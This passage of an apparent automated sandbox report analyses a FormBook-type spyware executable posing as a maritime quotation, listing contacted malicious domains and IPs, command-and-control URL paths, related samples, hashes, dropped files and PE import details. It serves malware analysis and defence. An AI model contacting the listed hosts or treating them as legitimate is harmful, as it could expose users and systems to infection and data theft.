                                                                          		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                                          76.223.54.146
                                                                          		www.bonheur.techUnited States
                                                                          		16509AMAZON-02UStrue
                                                                          104.21.96.1
                                                                          		www.mzkd6gp5.topUnited States
                                                                          		13335CLOUDFLARENETUStrue
                                                                          202.95.11.110
                                                                          		www.mirenzhibo.netSingapore
                                                                          		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                          104.21.13.141
                                                                          		www.ogbos88.cyouUnited States
                                                                          		13335CLOUDFLARENETUStrue
                                                                          136.243.64.147
                                                                          		100millionjobs.africaGermany
                                                                          		24940HETZNER-ASDEtrue
                                                                          198.58.118.167
                                                                          		www.chiro.liveUnited States
                                                                          		63949LINODE-APLinodeLLCUStrue

                                                                          General Information

                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1586802
                                                                          Start date and time:2025-01-09 16:44:10 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 16m 47s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                          Run name:Suspected Instruction Hammering
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:2
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Sample name:QUOTATION#070125-ELITE MARINE .exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/2@18/12
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 96%
                                                                          • Number of executed functions: 53
                                                                          • Number of non-executed functions: 310
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): WerFault.exe, svchost.exe
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • VT rate limit hit for: QUOTATION#070125-ELITE MARINE .exe

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          10:47:50API Interceptor22291886x Sleep call for process: cmdkey.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          160.25.166.123QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • www.rpa.asia/bwjl/
                                                                          z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                          • www.rpa.asia/ggyo/
                                                                          103.106.67.112QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • www.furrcali.xyz/k29t/
                                                                          rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                          • www.furrcali.xyz/3dtl/?4v7=WTzrGLrFoDOf3MfqMggnB2yODJjw2W6R3d7AI4DzdlPnCYzv+YsvzCma/KjEqV7kmJXwzvABskUepNotbm90GG8Ab8L4vbMqXlBd8atmujJl3TdcKhvlJPk=&pRel=chN0
                                                                          PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                          • www.furrcali.xyz/86f0/
                                                                          Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.sailforever.xyz/p4rk/
                                                                          Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                          • www.sailforever.xyz/hshp/
                                                                          BL.exeGet hashmaliciousFormBookBrowse
                                                                          • www.sailforever.xyz/hshp/
                                                                          BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                          • www.sailforever.xyz/hshp/
                                                                          104.21.112.1wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                          • beammp.com/phpmyadmin/
                                                                          194.9.94.85PO-000172483 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • www.milp.store/2j93/
                                                                          Order.exeGet hashmaliciousFormBookBrowse
                                                                          • www.deeplungatlas.org/57zf/
                                                                          SDBARVe3d3.exeGet hashmaliciousFormBookBrowse
                                                                          • www.deeplungatlas.org/57zf/
                                                                          Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                          • www.xn--matfrmn-jxa4m.se/4hda/
                                                                          proforma invoice.exeGet hashmaliciousFormBookBrowse
                                                                          • www.xn--matfrmn-jxa4m.se/4hda/
                                                                          Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                          • www.xn--matfrmn-jxa4m.se/4hda/
                                                                          shipping documents.exeGet hashmaliciousFormBookBrowse
                                                                          • www.xn--matfrmn-jxa4m.se/4hda/
                                                                          MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                                                                          • www.xn--matfrmn-jxa4m.se/4hda/
                                                                          PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • www.xn--matfrmn-jxa4m.se/4hda/
                                                                          docs_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • www.xn--matfrmn-jxa4m.se/4hda/

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.rpa.asiaQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 160.25.166.123
                                                                          z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                          • 160.25.166.123
                                                                          www.chiro.liveQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.33.23.183
                                                                          www.mzkd6gp5.topQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 104.21.64.1
                                                                          CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                          • 172.67.158.81
                                                                          www.milp.storeQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 194.9.94.85
                                                                          PO-000172483 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 194.9.94.85
                                                                          new.exeGet hashmaliciousFormBookBrowse
                                                                          • 194.9.94.86
                                                                          PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                          • 194.9.94.86
                                                                          www.mirenzhibo.netQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 202.95.11.110
                                                                          rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                          • 202.95.11.110
                                                                          z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                          • 202.95.11.110
                                                                          www.bonheur.techQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 13.248.169.48
                                                                          PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                          • 76.223.54.146
                                                                          www.givvjn.infoQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 47.83.1.90
                                                                          www.bokus.siteQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 199.192.21.169
                                                                          www.furrcali.xyzQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.106.67.112
                                                                          rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.106.67.112
                                                                          PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.106.67.112

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          GIGAINFRASoftbankBBCorpJP6.elfGet hashmaliciousUnknownBrowse
                                                                          • 126.228.237.104
                                                                          QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 160.25.166.123
                                                                          5.elfGet hashmaliciousUnknownBrowse
                                                                          • 171.2.26.236
                                                                          6.elfGet hashmaliciousUnknownBrowse
                                                                          • 220.38.176.232
                                                                          6.elfGet hashmaliciousUnknownBrowse
                                                                          • 126.126.55.244
                                                                          3.elfGet hashmaliciousUnknownBrowse
                                                                          • 157.103.108.160
                                                                          arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 123.230.33.166
                                                                          arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 221.51.193.17
                                                                          6.elfGet hashmaliciousUnknownBrowse
                                                                          • 220.8.167.167
                                                                          miori.ppc.elfGet hashmaliciousUnknownBrowse
                                                                          • 221.85.111.46
                                                                          VOYAGERNET-AS-APVoyagerInternetLtdNZQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.106.67.112
                                                                          5.elfGet hashmaliciousUnknownBrowse
                                                                          • 202.154.140.238
                                                                          rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.106.67.112
                                                                          PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.106.67.112
                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                          • 202.154.136.19
                                                                          sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                          • 202.154.140.249
                                                                          loligang.mips-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                                          • 114.23.255.61
                                                                          Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 103.106.67.112
                                                                          sh4.elfGet hashmaliciousMiraiBrowse
                                                                          • 111.65.234.249
                                                                          la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                          • 114.23.128.23
                                                                          CLOUDFLARENETUShttps://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2Get hashmaliciousUnknownBrowse
                                                                          • 104.17.25.14
                                                                          Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                          • 104.21.64.1
                                                                          Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.16.1
                                                                          Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                          • 172.64.155.59
                                                                          https://ccml.io/Get hashmaliciousUnknownBrowse
                                                                          • 104.17.24.14
                                                                          http://readermodeext.infoGet hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          https://bryf.atchirlisc.ru/EeMAGvIe/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 172.64.41.3
                                                                          http://readermodeext.infoGet hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.96.1

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Temp\b427-I_1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmdkey.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                          Category:dropped
                                                                          Size (bytes):135168
                                                                          Entropy (8bit):1.1142956103012707
                                                                          Encrypted:false
                                                                          SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                          MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                          SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                          SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                          SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\scroll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):288256
                                                                          Entropy (8bit):7.994161087443874
                                                                          Encrypted:true
                                                                          SSDEEP:6144:TR3SdWrUsHs2wQb50ccdixlgFbRX9cSaCRLi7QbztVprXbAgj3:TgMs2wQb5patX9c0RLimjka
                                                                          MD5:2F4CA8506AC4A0AE022B5EB39877BC8E
                                                                          SHA1:82431BF0F771A07F1086C536C60818CD91C73E11
                                                                          SHA-256:7F6E2C96C0C37B18E883B12BF2981A4925B9903D0C7B065893408F0C30EA30EC
                                                                          SHA-512:0F836451F6896E445074B947463F43E681FEC467C7205BE926372CD003E76AC4B2E7ACDC74EA140FF8E87B15657327C52FC7B074808DEE3226161B09605E1A46
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.k.YU6C6SGSB..B0.0Y19YV6.6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6.6WG]].CB.8.x.8....^>4s24"%BP]yRX78Y7.5"s03#bY_..~jy;Y'SyJ^HbMB010Y1@X_.~V0.n"!..PV.C...lV$.M...z-%.+....91.._4/n"!.B010Y19Y.sC6.FRB,..m10Y19YV6.6UFXCMMBd50Y19YV6C6.RSBF]B01@]19Y.6C&WGS@FMD010Y19YP6C6WGSBF=F012Y19YV6A6..SBVMB 10Y1)YV&C6WGSBVMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010wE\!"6C6..WBF]B01d]19IV6C6WGSBFMB010y199V6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WGSBFMB010Y19YV6C6WG

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.426580759981662
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:QUOTATION#070125-ELITE MARINE .exe
                                                                          File size:1'749'504 bytes
                                                                          MD5:71a9653e383348db78edaa7619dea426
                                                                          SHA1:4670f01da3fe979ffe6c27ef16080cdb71c03770
                                                                          SHA256:8cf3f5031f2201c448b2dc53d88b0a2142797116a6781d0f1222733127711add
                                                                          SHA512:05ef9586056b2921a6a893afc244e98060728dab665396a3e94612bc4f3c16c5faa7d4ac6b13e70b8f47c3b25aeda4e04ce30b74e8ca016bab9aa479bdffa259
                                                                          SSDEEP:24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8aU3X3N5RrgedytPHS12D95/KvAr:7TvC/MTQYxsWR7aUH3N5Knfs2D95/6
                                                                          TLSH:E885E1023781C022FF9B95330BA7F7158BBC6A260527A51F13981DB9BE705B1563E7A3
                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                          File Icon

                                                                          Icon Hash:333333ab693b9b98

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x420577
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x677DC322 [Wed Jan 8 00:13:22 2025 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:948cc502fe9226992dce9417f952fce3

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          call 00007F23704C2A03h
                                                                          jmp 00007F23704C230Fh
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007F23704C24EDh
                                                                          mov dword ptr [esi], 0049FDF0h
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 0049FDF8h
                                                                          mov dword ptr [ecx], 0049FDF0h
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007F23704C24BAh
                                                                          mov dword ptr [esi], 0049FE0Ch
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 0049FE14h
                                                                          mov dword ptr [ecx], 0049FE0Ch
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          mov esi, ecx
                                                                          lea eax, dword ptr [esi+04h]
                                                                          mov dword ptr [esi], 0049FDD0h
                                                                          and dword ptr [eax], 00000000h
                                                                          and dword ptr [eax+04h], 00000000h
                                                                          push eax
                                                                          mov eax, dword ptr [ebp+08h]
                                                                          add eax, 04h
                                                                          push eax
                                                                          call 00007F23704C50ADh
                                                                          pop ecx
                                                                          pop ecx
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          lea eax, dword ptr [ecx+04h]
                                                                          mov dword ptr [ecx], 0049FDD0h
                                                                          push eax
                                                                          call 00007F23704C50F8h
                                                                          pop ecx
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          mov esi, ecx
                                                                          lea eax, dword ptr [esi+04h]
                                                                          mov dword ptr [esi], 0049FDD0h
                                                                          push eax
                                                                          call 00007F23704C50E1h
                                                                          test byte ptr [ebp+08h], 00000001h
                                                                          pop ecx

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xd4730.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a90000x7594.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0xd40000xd47300xd48005c662028dfbadfd7ddda2fd58077e9fbFalse0.9284214154411765data7.900006171123141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x1a90000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0xd45480x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                          RT_ICON0xd46700x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                          RT_ICON0xd47980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                          RT_ICON0xd48c00x10d8bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9989130907351854
                                                                          RT_ICON0xe564c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishGreat Britain0.42335561339169525
                                                                          RT_ICON0xf5e740x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishGreat Britain0.5058455361360416
                                                                          RT_ICON0xfa09c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishGreat Britain0.5346473029045643
                                                                          RT_ICON0xfc6440x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishGreat Britain0.6055347091932458
                                                                          RT_ICON0xfd6ec0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishGreat Britain0.7225177304964538
                                                                          RT_MENU0xfdb540x50dataEnglishGreat Britain0.9
                                                                          RT_STRING0xfdba40x594dataEnglishGreat Britain0.3333333333333333
                                                                          RT_STRING0xfe1380x68adataEnglishGreat Britain0.2735961768219833
                                                                          RT_STRING0xfe7c40x490dataEnglishGreat Britain0.3715753424657534
                                                                          RT_STRING0xfec540x5fcdataEnglishGreat Britain0.3087467362924282
                                                                          RT_STRING0xff2500x65cdataEnglishGreat Britain0.34336609336609336
                                                                          RT_STRING0xff8ac0x466dataEnglishGreat Britain0.3605683836589698
                                                                          RT_STRING0xffd140x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                          RT_RCDATA0xffe6c0xa8360data1.0003207584413172
                                                                          RT_GROUP_ICON0x1a81cc0x5aTarga image data - Map 32 x 3467 x 1 +1EnglishGreat Britain0.7888888888888889
                                                                          RT_GROUP_ICON0x1a82280x14dataEnglishGreat Britain1.25
                                                                          RT_GROUP_ICON0x1a823c0x14dataEnglishGreat Britain1.15
                                                                          RT_GROUP_ICON0x1a82500x14dataEnglishGreat Britain1.25
                                                                          RT_VERSION0x1a82640xdcdataEnglishGreat Britain0.6181818181818182
                                                                          RT_MANIFEST0x1a83400x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                          Imports

                                                                          DLLImport
                                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                          UxTheme.dllIsThemeActive
                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, 